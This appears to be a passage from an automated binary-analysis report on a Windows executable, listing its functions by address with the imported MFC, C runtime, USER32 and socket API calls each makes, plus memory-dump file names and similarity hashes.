Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#800H_prologMessageSend$#2915#5572
String ID:
API String ID: 1189720065-0
Opcode ID: d4a61205231731c8282ea76ed0ef12fef10e474b9983ab544a4f258dd33f1770
Instruction ID: 4ad2796f5dac447004704026fbccb0e4ce08cf83dc34ed721446c5b33a4290fe
Opcode Fuzzy Hash: d4a61205231731c8282ea76ed0ef12fef10e474b9983ab544a4f258dd33f1770
Instruction Fuzzy Hash: A7F09071A10218BBCB04EF55D443AED7B68EB04368F40C12FF826671D2CB78AB05CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401C49, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D5F1
#535.MFC42(?), ref: 0040D608
#535.MFC42(?,?,?), ref: 0040D622
#800.MFC42(00000002,?,?,?), ref: 0040D637

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535$#800H_prolog
String ID:
API String ID: 2983561589-0
Opcode ID: 2f5e5a4dde59d7ebb53790eb3d27c6962970ed40c0e1829819256736254b3dbf
Instruction ID: 7aa6d1862abfef7b1845e3cd35072f2e27bc925c89a7e9d005097d4391745ce2
Opcode Fuzzy Hash: 2f5e5a4dde59d7ebb53790eb3d27c6962970ed40c0e1829819256736254b3dbf
Instruction Fuzzy Hash: 42F03671A10214A7CB08EF55D807AED7768EB14358F40461FB452671D2CB7C9A048A99

Uniqueness

Uniqueness Score: -1.00%

Function 004250F8, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

#825.MFC42(?,?,?,?), ref: 00425114
??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00425125
#825.MFC42(?), ref: 0042513A
??1_Lockit@std@@QAE@XZ.MSVCP60(?), ref: 0042514A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #825Lockit@std@@$??0_??1_
String ID:
API String ID: 2095439190-0
Opcode ID: 57422c67f83043ef9cc619c992341cda1299ca48443defd097b7f72fac008779
Instruction ID: 85fd8ce5c6a3cf115b113f280a013869f9114d6730fa7f43a5f297af461df3fc
Opcode Fuzzy Hash: 57422c67f83043ef9cc619c992341cda1299ca48443defd097b7f72fac008779
Instruction Fuzzy Hash: A4F0E976510514DFCB15DF50ED05BB973B8EF11326F40442EF516925A1CBB86D04CF48

Uniqueness

Uniqueness Score: -1.00%

Function 00401695, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D386
#540.MFC42 ref: 0040D392
#2817.MFC42(?,00008075,00000000), ref: 0040D3B0
#800.MFC42 ref: 0040D3CA

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2817#540#800H_prolog
String ID:
API String ID: 1600685448-0
Opcode ID: 0948a97d998ffb4681851bdafb4a8756c2d715769cd209e97617a88bf2c6c92d
Instruction ID: 95dfc7d0001d97af2732ff64e08f49df20cff15594c9fda3c5365b2aa5317bd1
Opcode Fuzzy Hash: 0948a97d998ffb4681851bdafb4a8756c2d715769cd209e97617a88bf2c6c92d
Instruction Fuzzy Hash: A4F05471E106249BC705EB94D846AEEB378FF00318F40856FF422671D1DF785A04CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004127CC, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

#825.MFC42 ref: 004127D2
wcslen.MSVCRT ref: 004127E1
#823.MFC42(00000000), ref: 004127EF
wcscpy.MSVCRT ref: 004127FE

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823#825wcscpywcslen
String ID:
API String ID: 2167346236-0
Opcode ID: 6e3641b4ffb384c893736083bb6564e0aeadd6186dd21a3a6c5f9cfe7f137cf5
Instruction ID: cc5779e319cf59fc1668ff8a9ec70367811841f5c1c2873a32d2af3225a61a72
Opcode Fuzzy Hash: 6e3641b4ffb384c893736083bb6564e0aeadd6186dd21a3a6c5f9cfe7f137cf5
Instruction Fuzzy Hash: 6FE092775042039BD3256F29F808AA777A9EBD1321B35082FF081D2150EB789491867C

Uniqueness

Uniqueness Score: -1.00%

Function 00423228, Relevance: 6.0, APIs: 4, Instructions: 27windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0042322D
DestroyIcon.USER32(?), ref: 0042324E
#800.MFC42 ref: 00423267
#800.MFC42 ref: 00423273

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$DestroyH_prologIcon
String ID:
API String ID: 4212283764-0
Opcode ID: 5cbccab03c5fcaa86d6ee933441c5ccd33a687f4bbab4f1bfbbef26ab9712090
Instruction ID: 038419cbabf5ceb4558fd951412c38bc75bf0a30bb30eeb4090c0b998860b8d7
Opcode Fuzzy Hash: 5cbccab03c5fcaa86d6ee933441c5ccd33a687f4bbab4f1bfbbef26ab9712090
Instruction Fuzzy Hash: 2CF0B470A10720DBC724EF19D50579EB7F8AF04318F804A6EE042936E1CBF8AA08CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401118, Relevance: 6.0, APIs: 4, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 0041D8CA
DestroyIcon.USER32(00000000), ref: 0041D8D4
#825.MFC42(00000000), ref: 0041D8DB
#2582.MFC42(?), ref: 0041D8E4

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2582#825DestroyIconMessageSend
String ID:
API String ID: 1315100164-0
Opcode ID: 3b35bb35cc6f0c296f19d61580576fad930d890efddaef6455558b11b5490002
Instruction ID: 843c9e9be92369fec90ab699544b4c14ed6132900770cd7d464df2c84bbf804a
Opcode Fuzzy Hash: 3b35bb35cc6f0c296f19d61580576fad930d890efddaef6455558b11b5490002
Instruction Fuzzy Hash: DAE026773000107BE2006B55EC8AEBBBBACEFCC321F80003AF6058B160CE601C418768

Uniqueness

Uniqueness Score: -1.00%

Function 004126FF, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412704
#772.MFC42 ref: 00412729
#772.MFC42 ref: 00412735
#2438.MFC42 ref: 00412749

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #772$#2438H_prolog
String ID:
API String ID: 3110429667-0
Opcode ID: 1857e1bab3f59524de76d0b570f94e98c9fdf4f6e1f8755f63d4d1e0108dcb82
Instruction ID: 40acb17291f297ac7ff364638eb5e04f9ca002f17c80638e55893d232e1b17fd
Opcode Fuzzy Hash: 1857e1bab3f59524de76d0b570f94e98c9fdf4f6e1f8755f63d4d1e0108dcb82
Instruction Fuzzy Hash: 33F05EB0A10261EADB14EF95E11539DBBF4AF08308F91844FA44567282DBF85A48CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401C76, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

#5153.MFC42(?,?,?,?,?), ref: 0041016A
GetParent.USER32(?), ref: 00410172
#2864.MFC42(00000000,?,?,?,?,?), ref: 00410179
#3089.MFC42(00000000,?,?,?,?,?), ref: 00410180

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2864#3089#5153Parent
String ID:
API String ID: 2106280735-0
Opcode ID: 43e1feb372dbf9cd0971cdaeea6a3234ca91794370e6bef9619228ee94aa100a
Instruction ID: 1d1100b4f6cb48a6d01a84773466699b4b90b3207594c99b4888a55f835b703f
Opcode Fuzzy Hash: 43e1feb372dbf9cd0971cdaeea6a3234ca91794370e6bef9619228ee94aa100a
Instruction Fuzzy Hash: 46E02B3160035077D7206B72940878BBBF4AFD6348F00492FF54993251DBBC98C087D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040868A, Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040868F
#686.MFC42 ref: 004086AE

Part of subcall function 00401776: _EH_prolog.MSVCRT ref: 004095F0
Part of subcall function 00401776: #2414.MFC42 ref: 00409615
Part of subcall function 00401776: #2414.MFC42 ref: 00409633
Part of subcall function 00401776: #800.MFC42 ref: 00409641
Part of subcall function 00401776: #800.MFC42 ref: 0040964D

#800.MFC42 ref: 004086C9
#813.MFC42 ref: 004086D4

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#2414H_prolog$#686#813
String ID:
API String ID: 3913026089-0
Opcode ID: 83339ceba757a708379911131cbb9e092580f24500055a0c7d7930d70503fa91
Instruction ID: 0afae61b7abf0a833ddaa2bcfd0d74808dc1803961c9ff420596e43840aea7bb
Opcode Fuzzy Hash: 83339ceba757a708379911131cbb9e092580f24500055a0c7d7930d70503fa91
Instruction Fuzzy Hash: 70F08270A25A30DBD714EF55D1057DDB7B4AF04308F50854EB052532C2CBB85A04C755

Uniqueness

Uniqueness Score: -1.00%

Function 0040A84F, Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A854
#693.MFC42 ref: 0040A873
#686.MFC42 ref: 0040A882
#800.MFC42 ref: 0040A894

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #686#693#800H_prolog
String ID:
API String ID: 2287689474-0
Opcode ID: fac38aeab77103ee07ac49ae08c0c4314fb96717f9dc7f60f847e1eacbfb860b
Instruction ID: 8ce95233d57b576a2b66469751a6a9d3804189a1a10b18a07b8d1f37bfeb16f2
Opcode Fuzzy Hash: fac38aeab77103ee07ac49ae08c0c4314fb96717f9dc7f60f847e1eacbfb860b
Instruction Fuzzy Hash: F3F082B0A11664DBC714EF55D1567DDF7F4AF04308F508A5EE092632C1CBF85A04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004098B2, Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004098B7
#686.MFC42 ref: 004098D6

Part of subcall function 00401776: _EH_prolog.MSVCRT ref: 004095F0
Part of subcall function 00401776: #2414.MFC42 ref: 00409615
Part of subcall function 00401776: #2414.MFC42 ref: 00409633
Part of subcall function 00401776: #800.MFC42 ref: 00409641
Part of subcall function 00401776: #800.MFC42 ref: 0040964D

#800.MFC42 ref: 004098F1
#813.MFC42 ref: 004098FC

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#2414H_prolog$#686#813
String ID:
API String ID: 3913026089-0
Opcode ID: 92d0577ddb468acb53a0eefc9ef4ab7cf39987f4f1258e3c1d89812bedf188b5
Instruction ID: 2888869936f9c26760bfc1ad6e1ae0c4ad0d924df8412395594823674f878b7d
Opcode Fuzzy Hash: 92d0577ddb468acb53a0eefc9ef4ab7cf39987f4f1258e3c1d89812bedf188b5
Instruction Fuzzy Hash: 51F08C71A21A70DBC718EF55E2067DDBBF4AF04308F50864EA062632C2CBB85A04CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF30, Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BF35
#537.MFC42(00008076), ref: 0040BF54
#6199.MFC42(?,00008076), ref: 0040BF62
#800.MFC42(?,00008076), ref: 0040BF6E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #537#6199#800H_prolog
String ID:
API String ID: 1486046808-0
Opcode ID: 44f38954f38636840d216e2b84b58274080d86404a61c8a94af1a08b4eebf39b
Instruction ID: 5a2c16d1b8c0e0c67933f569f07d6cef1fbe9a7b7c7a25194cc0a6fa85551220
Opcode Fuzzy Hash: 44f38954f38636840d216e2b84b58274080d86404a61c8a94af1a08b4eebf39b
Instruction Fuzzy Hash: 7EF03031A11535EBCB15DB54DC16BEEB330FB44718F50466E9422771D5CB786A06CA8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0E6, Relevance: 6.0, APIs: 4, Instructions: 23windowCOMMON

Download Yara Rule

APIs

#1168.MFC42 ref: 0041E0E9
#1146.MFC42(?,0000000E,?), ref: 0041E0F7
LoadIconA.USER32(00000000,?), ref: 0041E0FD
InvalidateRect.USER32(?,00000000,00000001), ref: 0041E11F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1146#1168IconInvalidateLoadRect
String ID:
API String ID: 207787090-0
Opcode ID: 8c829e885d0125ee4ef96d0c51400144145fdfa8038c383796fc22f2e6471667
Instruction ID: 65b89f1b41569846a383c4487af8ac28437d0caf868fe324217721ce653cf508
Opcode Fuzzy Hash: 8c829e885d0125ee4ef96d0c51400144145fdfa8038c383796fc22f2e6471667
Instruction Fuzzy Hash: 6FE04FB66447106EE7209BB0AD0AFA7B6D8BF49701F000C1FB786DA1D0D6F594408714

Uniqueness

Uniqueness Score: -1.00%

Function 0041E3C0, Relevance: 6.0, APIs: 4, Instructions: 22networkCOMMON

Download Yara Rule

APIs

gethostname.WSOCK32(?,000000FF), ref: 0041E3D9
gethostbyname.WSOCK32(?,?,000000FF), ref: 0041E3E5
inet_ntoa.WSOCK32(?,?,?,000000FF), ref: 0041E3F5
#537.MFC42(00000000,?,?,?,000000FF), ref: 0041E3FE

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #537gethostbynamegethostnameinet_ntoa
String ID:
API String ID: 1318074273-0
Opcode ID: 2a69c4fe989c606861920f9aa9c22065f9add5a15fc269c6bc6f63393da67204
Instruction ID: 01aa425ef99b51685310bb57ddb701172b0e319bb21b2b76e1516207d46871b0
Opcode Fuzzy Hash: 2a69c4fe989c606861920f9aa9c22065f9add5a15fc269c6bc6f63393da67204
Instruction Fuzzy Hash: EFE09B7460011DABCF10FF90E685EDCB3BCEF14308F424055F9049B151CA78EA44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0041BCF0, Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

